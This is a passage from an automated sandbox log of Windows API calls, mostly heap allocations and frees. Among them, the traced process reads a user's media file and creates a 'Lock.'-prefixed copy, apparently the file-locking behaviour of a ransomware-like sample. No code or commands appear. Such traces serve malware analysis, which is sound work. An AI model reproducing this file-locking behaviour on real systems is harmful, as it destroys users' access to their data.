hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.981] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0199.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0199.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0199.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.987] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.987] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.987] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.987] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/jfoRUvp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jforuvp.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0199.989] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.989] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0199.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0199.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0199.989] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.990] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.990] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0199.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.991] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0199.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0199.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0199.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.991] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.jfoRUvp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.jforuvp.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0199.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0199.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0199.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0199.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.992] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.992] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.992] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.993] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | 